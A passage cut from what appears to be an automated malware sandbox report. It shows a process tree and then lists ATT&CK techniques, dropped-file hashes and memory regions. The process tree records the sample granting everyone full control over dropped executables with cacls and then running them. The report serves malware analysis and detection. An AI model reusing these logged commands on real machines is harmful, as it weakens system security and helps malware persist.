                                                                                                                                                    cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1060
                                                                                                                                                  • C:\Windows\system32\cmd.EXE
                                                                                                                                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2424
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1164
                                                                                                                                                        • C:\Windows\system32\cacls.exe
                                                                                                                                                          cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4700
                                                                                                                                                        • C:\Windows\system32\cmd.EXE
                                                                                                                                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4776
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2144
                                                                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                                                                cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:512
                                                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:6564
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1116
                                                                                                                                                                    • C:\Windows\system32\cacls.exe
                                                                                                                                                                      cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5140
                                                                                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                                                                                      C:\Windows\system32\cmd.EXE /c C:\Windows\ime\blifehe.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5384
                                                                                                                                                                        • C:\Windows\ime\blifehe.exe
                                                                                                                                                                          C:\Windows\ime\blifehe.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:2412

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                      Execution

                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                      1
                                                                                                                                                                      T1053

                                                                                                                                                                      Persistence

                                                                                                                                                                      Create or Modify System Process

                                                                                                                                                                      1
                                                                                                                                                                      T1543

                                                                                                                                                                      Windows Service

                                                                                                                                                                      1
                                                                                                                                                                      T1543.003

                                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                                      1
                                                                                                                                                                      T1547

                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                      1
                                                                                                                                                                      T1547.001

                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                      1
                                                                                                                                                                      T1053

                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                      Create or Modify System Process

                                                                                                                                                                      1
                                                                                                                                                                      T1543

                                                                                                                                                                      Windows Service

                                                                                                                                                                      1
                                                                                                                                                                      T1543.003

                                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                                      1
                                                                                                                                                                      T1547

                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                      1
                                                                                                                                                                      T1547.001

                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                      1
                                                                                                                                                                      T1053

                                                                                                                                                                      Defense Evasion

                                                                                                                                                                      Impair Defenses

                                                                                                                                                                      1
                                                                                                                                                                      T1562

                                                                                                                                                                      Disable or Modify System Firewall

                                                                                                                                                                      1
                                                                                                                                                                      T1562.004

                                                                                                                                                                      Modify Registry

                                                                                                                                                                      1
                                                                                                                                                                      T1112

                                                                                                                                                                      Discovery

                                                                                                                                                                      Network Service Discovery

                                                                                                                                                                      2
                                                                                                                                                                      T1046

                                                                                                                                                                      Query Registry

                                                                                                                                                                      1
                                                                                                                                                                      T1012

                                                                                                                                                                      System Information Discovery

                                                                                                                                                                      1
                                                                                                                                                                      T1082

                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                      1
                                                                                                                                                                      T1018

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\Windows\SysWOW64\Packet.dll
                                                                                                                                                                        Filesize

                                                                                                                                                                        95KB

                                                                                                                                                                        MD5

                                                                                                                                                                        86316be34481c1ed5b792169312673fd

                                                                                                                                                                        SHA1

                                                                                                                                                                        6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                                                                                                                        SHA256

                                                                                                                                                                        49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                                                                                                                        SHA512

                                                                                                                                                                        3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                                                                                                                      • C:\Windows\SysWOW64\wpcap.dll
                                                                                                                                                                        Filesize

                                                                                                                                                                        275KB

                                                                                                                                                                        MD5

                                                                                                                                                                        4633b298d57014627831ccac89a2c50b

                                                                                                                                                                        SHA1

                                                                                                                                                                        e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                                                                                                                        SHA256

                                                                                                                                                                        b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                                                                                                                        SHA512

                                                                                                                                                                        29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\1288.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        9.0MB

                                                                                                                                                                        MD5

                                                                                                                                                                        b074f643e3b878baa49f0be3dbd9cda9

                                                                                                                                                                        SHA1

                                                                                                                                                                        909d4430bd1eb18c0a594a800a5568fd483d4515

                                                                                                                                                                        SHA256

                                                                                                                                                                        6c943f76b0a34b5d2563fdcba0ad9f100884c56d71eed6346e4a902d40ad2a06

                                                                                                                                                                        SHA512

                                                                                                                                                                        46aaff205fb98dc5fff54f0495372ef519e6f1432dcd54606e6d9e1bcafa6aec176bc15ce8fb0594fbd9e61a9d102a64886623e225c2f44f2a212e096109f70c

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\1656.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.2MB

                                                                                                                                                                        MD5

                                                                                                                                                                        419bafde73b510a08d834372fe91b2b9

                                                                                                                                                                        SHA1

                                                                                                                                                                        5223f46d3227dd41585e75baca7f0cf8571bd23b

                                                                                                                                                                        SHA256

                                                                                                                                                                        623db22e7eeee1631e6109242e42bb2ded07797eb5be63973a7937b823938fb1

                                                                                                                                                                        SHA512

                                                                                                                                                                        1afcbfaa5d9f9ba92af846c5998ef9601407a33f12a8a4e7252fd137ae42f11a2994982e1c35f77f073b1ba0977030b10cb7da3fe6542accd8f86f161ea64cad

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\2704.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        7.6MB

                                                                                                                                                                        MD5

                                                                                                                                                                        76704b5a96e7822cb5d9a3d58a1a4aab

                                                                                                                                                                        SHA1

                                                                                                                                                                        11fb722132dda590bf36ad9f0189733676e4bc81

                                                                                                                                                                        SHA256

                                                                                                                                                                        834015a04a23e8460c56ad3011f95874329d11fb55f68297a2363ae652d8a431

                                                                                                                                                                        SHA512

                                                                                                                                                                        312f82cb063c547f78c81898b77d3fe81e96599bc915f02cee54bd79fcc4ffcd3c072edaa33b7b9c532a2b620f289d6a40fb21062cca23656cbb154fcee2fb47

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\2872.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4.2MB

                                                                                                                                                                        MD5

                                                                                                                                                                        2b44c2faf9d0e23fe807f9b21f6f714b

                                                                                                                                                                        SHA1

                                                                                                                                                                        a6f9a38f46b792f1b8ddcfe1a09a8d1cfdcfbe3f

                                                                                                                                                                        SHA256

                                                                                                                                                                        8de82e68d9433f9da576251dcdd2cee86c94d4dcbdf000e0869cd77f5286ac02

                                                                                                                                                                        SHA512

                                                                                                                                                                        d85062206cb51af0b3dd0116c4bff3e127373599be5b79926dde036e2e107823b1d6c5df5bf1f6525ca64dd181f2efb70f32b848e5b2fd72848a7e066b6e8ed9

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\2956.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        26.0MB

                                                                                                                                                                        MD5

                                                                                                                                                                        7d2bc7b5789c99a10a6b878e6d5cd584

                                                                                                                                                                        SHA1

                                                                                                                                                                        d9613a671c14e60b850bec27aa463c7ddb6b260d

                                                                                                                                                                        SHA256

                                                                                                                                                                        a3c4ba92c471b8ef99ee5124d03ea79a34752eba51c3c6141091cd5169548ce6

                                                                                                                                                                        SHA512

                                                                                                                                                                        e9d6d9542a2fecba6cece5631158281a12a49c139575579aa555dac25b4ec2c9a6b1d838d6e23d3b2e51ed2f8b298251d2ea3f9d0c89001f92a47fa69e9f804a

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\3036.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        3.0MB

                                                                                                                                                                        MD5

                                                                                                                                                                        ba45e705b30e0eee25a7561ad3f9a767

                                                                                                                                                                        SHA1

                                                                                                                                                                        19e53919bbae506d2ea8037f6cabfcb0dd22ab2d

                                                                                                                                                                        SHA256

                                                                                                                                                                        00e7d357170fabc38ba8cfbee8f315059b52d542eabbd023ba1689093b6313ca

                                                                                                                                                                        SHA512

                                                                                                                                                                        cc26699583cb9e133eab914aaf3a0797f9d17045a027071419bc720a58d8b7e821bf8f79f8f959a3417a8bd001f1d0f4766643df7b0368b8410566b186857d38

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\3056.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        810KB

                                                                                                                                                                        MD5

                                                                                                                                                                        183a4ff70f7949f1bd82abd545cfc59a

                                                                                                                                                                        SHA1

                                                                                                                                                                        626e63b26b035e7d88673f6b18bc62f3c084797a

                                                                                                                                                                        SHA256

                                                                                                                                                                        5478855758945e06635503a87bf171cdadb7700fd246899f8c6d418a5dca486c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3fb312c9e6826b565ed9c6300a88a1758a13cb25243787b0d0b99848dea10060af92cb35395e0cf23fe790fd06011e966f5cf9b0e94bb5b21e30b2423c94d36d

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\3720.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        2.4MB

                                                                                                                                                                        MD5

                                                                                                                                                                        9c850f84983b9458c1f4a47ca50ec293

                                                                                                                                                                        SHA1

                                                                                                                                                                        17f04b337a1a3b5868a5f31156a7761ff582a7d8

                                                                                                                                                                        SHA256

                                                                                                                                                                        fc68617326a1d0465afb94bd9485414e913fc48ca19790029ab035548198f1e6

                                                                                                                                                                        SHA512

                                                                                                                                                                        0b6b3a03deb2f9164e1faaa5651488a0e60677075756ec80ac46c96a4fbaf5c30d06a7888230dadb25735df262048fb99365b63b04092f107d1b858fd0daecb8

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\3808.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        20.7MB

                                                                                                                                                                        MD5

                                                                                                                                                                        4834f64749eb8f7c927be99e50b48c9d

                                                                                                                                                                        SHA1

                                                                                                                                                                        ea0b72d8bd6a1fefab7e97e5b9a1a82291b06bed

                                                                                                                                                                        SHA256

                                                                                                                                                                        ae45ab658e999f2cfa9ae6ad7ec12068e3b1707def26501bd9e87e9921742856

                                                                                                                                                                        SHA512

                                                                                                                                                                        85f84193e902f057f2a5ce02365178b037099599a1342980b26774e648e3889468d5c6b702ce277ac05f5556487aab1f1063e044443f137ce835cf5f23ac0321

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\3872.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        10.9MB

                                                                                                                                                                        MD5

                                                                                                                                                                        0c9159e22c6034074f4fffa44b49e839

                                                                                                                                                                        SHA1

                                                                                                                                                                        7818fe74cb07387aec2b9d1edd2e5d8190c5778b

                                                                                                                                                                        SHA256

                                                                                                                                                                        e7305222c21a9040d37b19e1d9a5cab15a97624ec46eb397ec8379ccc5fb2221

                                                                                                                                                                        SHA512

                                                                                                                                                                        a95798901704453f7bd7cb39b6a4c4164e6fffbd8b3654bb04da33c821216506caaac28b9069dd4a394c7951620e408528333bbf18295452cd02d540f5c47a5a

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\3944.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        45.4MB

                                                                                                                                                                        MD5

                                                                                                                                                                        79ba9a0b47b16be5af49743f1f38c549

                                                                                                                                                                        SHA1

                                                                                                                                                                        6ff4f7a4392fa4903c7ca2aa2451b2b5693f239f

                                                                                                                                                                        SHA256

                                                                                                                                                                        2b02c23ba1c9bb6be99aa77f3e16d7117aa2c5306f5ad9365211cbd5e6045684

                                                                                                                                                                        SHA512

                                                                                                                                                                        e6079317764bd99fda947a0b6a321715a492348b742a3204abe5ef92a206da45e7ad770816d2199d03edac84ab1d1e349adc035cd56d336f6eb2f3e3e7b2db57

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\64.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        33.5MB

                                                                                                                                                                        MD5

                                                                                                                                                                        1633def911d7cfb42df321dfe07d1f0d

                                                                                                                                                                        SHA1

                                                                                                                                                                        0d64ee86216b26e9dcf52ddd375ec255d7ea9445

                                                                                                                                                                        SHA256

                                                                                                                                                                        0c6c5672f23d144b4e6bea803886cb64c08fd56381ca339eeb61520232756b67

                                                                                                                                                                        SHA512

                                                                                                                                                                        3835a4b4e6181009d4168f49e84924a0298f90791f6e3f40466e46757f54593206e43d8b5922641a1517d093288e0f094b88ba1c6a1b87148b40feb8a25485c3

                                                                                                                                                                      • C:\Windows\TEMP\jnrubemey\764.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.9MB

                                                                                                                                                                        MD5

                                                                                                                                                                        6ad8e97abe67b87f6a3bcfe038783297

                                                                                                                                                                        SHA1

                                                                                                                                                                        22eebdc9a375cf1b041033a1c7a3bf957b6016e5

                                                                                                                                                                        SHA256

                                                                                                                                                                        af81b6d1ed71e9b5964ef4f8e2d6d36f23470961aaebd67f7cb9d61d7ceb404b

                                                                                                                                                                        SHA512

                                                                                                                                                                        c636f141b8becbd93019836d04e7a8abfd398bde5f6ab6f35825e5f934f383580ab1e44a5cd572efd9e36f15a827bfb01639f47ec1528ca23f117cc3f1d97f88

                                                                                                                                                                      • C:\Windows\TEMP\wvflutbti\config.json
                                                                                                                                                                        Filesize

                                                                                                                                                                        693B

                                                                                                                                                                        MD5

                                                                                                                                                                        f2d396833af4aea7b9afde89593ca56e

                                                                                                                                                                        SHA1

                                                                                                                                                                        08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                                                                                                                                        SHA256

                                                                                                                                                                        d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                                                                                                                                        SHA512

                                                                                                                                                                        2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                                                                                                                                      • C:\Windows\TEMP\xohudmc.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        72KB

                                                                                                                                                                        MD5

                                                                                                                                                                        cbefa7108d0cf4186cdf3a82d6db80cd

                                                                                                                                                                        SHA1

                                                                                                                                                                        73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                                                                                                                                        SHA256

                                                                                                                                                                        7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                                                                                                                                        SHA512

                                                                                                                                                                        b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                                                                                                                                      • C:\Windows\Temp\jnrubemey\ttliziesz.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        126KB

                                                                                                                                                                        MD5

                                                                                                                                                                        e8d45731654929413d79b3818d6a5011

                                                                                                                                                                        SHA1

                                                                                                                                                                        23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                                                                                                                        SHA256

                                                                                                                                                                        a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                                                                                                                        SHA512

                                                                                                                                                                        df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                                                                                                                                      • C:\Windows\Temp\nshBDF3.tmp\System.dll
                                                                                                                                                                        Filesize

                                                                                                                                                                        11KB

                                                                                                                                                                        MD5

                                                                                                                                                                        2ae993a2ffec0c137eb51c8832691bcb

                                                                                                                                                                        SHA1

                                                                                                                                                                        98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                                                                                                                        SHA256

                                                                                                                                                                        681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                                                                                                                        SHA512

                                                                                                                                                                        2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                                                                                                                                      • C:\Windows\Temp\nshBDF3.tmp\nsExec.dll
                                                                                                                                                                        Filesize

                                                                                                                                                                        6KB

                                                                                                                                                                        MD5

                                                                                                                                                                        b648c78981c02c434d6a04d4422a6198

                                                                                                                                                                        SHA1

                                                                                                                                                                        74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                                                                                                                        SHA256

                                                                                                                                                                        3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                                                                                                                        SHA512

                                                                                                                                                                        219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                                                                                                                                      • C:\Windows\Temp\wvflutbti\gfiitz.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        343KB

                                                                                                                                                                        MD5

                                                                                                                                                                        2b4ac7b362261cb3f6f9583751708064

                                                                                                                                                                        SHA1

                                                                                                                                                                        b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                                                                                                                                        SHA256

                                                                                                                                                                        a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                                                                                                                                        SHA512

                                                                                                                                                                        c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                                                                                                                                      • C:\Windows\jnrubemey\Corporate\vfshost.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        381KB

                                                                                                                                                                        MD5

                                                                                                                                                                        fd5efccde59e94eec8bb2735aa577b2b

                                                                                                                                                                        SHA1

                                                                                                                                                                        51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                                                                                                                        SHA256

                                                                                                                                                                        441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                                                                                                                        SHA512

                                                                                                                                                                        74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                                                                                                                                      • C:\Windows\jnrubemey\mzinlneik\llbnzpetn.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        332KB

                                                                                                                                                                        MD5

                                                                                                                                                                        ea774c81fe7b5d9708caa278cf3f3c68

                                                                                                                                                                        SHA1

                                                                                                                                                                        fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                                                                                                                        SHA256

                                                                                                                                                                        4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                                                                                                                        SHA512

                                                                                                                                                                        7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                                                                                                                                      • C:\Windows\jnrubemey\mzinlneik\wpcap.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        424KB

                                                                                                                                                                        MD5

                                                                                                                                                                        e9c001647c67e12666f27f9984778ad6

                                                                                                                                                                        SHA1

                                                                                                                                                                        51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                                                                                                                        SHA256

                                                                                                                                                                        7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                                                                                                                        SHA512

                                                                                                                                                                        56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                                                                                                                                      • C:\Windows\pifhbivn\blifehe.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        8.8MB

                                                                                                                                                                        MD5

                                                                                                                                                                        a819446ef1a6f3c6d12a700b93997548

                                                                                                                                                                        SHA1

                                                                                                                                                                        777c7dcd6333ae840f181d7410621d9c8fcd5915

                                                                                                                                                                        SHA256

                                                                                                                                                                        d3adca1bfd9844be8fb988162f0ada54e6491ef18793614d6f228d17c063dff9

                                                                                                                                                                        SHA512

                                                                                                                                                                        5ef2950bfc993d02ee4062e0076e4b824114459964ae5e096261949b91a58f5ed1424512e7bb8adbffa9c02b200b27a3ada17c5d438d3fcc13e315def99df4cd

                                                                                                                                                                      • C:\Windows\system32\drivers\etc\hosts
                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        c838e174298c403c2bbdf3cb4bdbb597

                                                                                                                                                                        SHA1

                                                                                                                                                                        70eeb7dfad9488f14351415800e67454e2b4b95b

                                                                                                                                                                        SHA256

                                                                                                                                                                        1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                                                                                                                                                        SHA512

                                                                                                                                                                        c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                                                                                                                                                      • memory/348-188-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/452-178-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/540-237-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/540-235-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/624-192-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/688-209-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/848-147-0x0000000010000000-0x0000000010008000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/848-7-0x0000000000400000-0x0000000000A9B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        6.6MB

                                                                                                                                                                      • memory/1544-218-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/1600-205-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/1796-233-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/1856-196-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/2668-0-0x0000000000400000-0x0000000000A9B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        6.6MB

                                                                                                                                                                      • memory/2760-200-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/3064-213-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/3228-223-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/3504-157-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/3504-141-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/3624-231-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/3740-239-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/3932-182-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/4032-175-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/4200-227-0x00007FF66E080000-0x00007FF66E0DB000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/4304-251-0x00000000007A0000-0x00000000007B2000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        72KB

                                                                                                                                                                      • memory/4340-136-0x00007FF7F58B0000-0x00007FF7F599E000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        952KB

                                                                                                                                                                      • memory/4340-135-0x00007FF7F58B0000-0x00007FF7F599E000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        952KB

                                                                                                                                                                      • memory/4624-221-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-171-0x0000016F3B4E0000-0x0000016F3B4E4000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                      • memory/4624-215-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-165-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-168-0x0000016F3B4B0000-0x0000016F3B4C0000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/4624-169-0x0000016F3B4C0000-0x0000016F3B4C4000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                      • memory/4624-170-0x0000016F3B4D0000-0x0000016F3B4D4000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                      • memory/4624-203-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-234-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-186-0x0000016F3B4C0000-0x0000016F3B4C4000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                      • memory/4624-257-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-173-0x0000016F3B4F0000-0x0000016F3B4F4000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                      • memory/4624-241-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-184-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-252-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-253-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
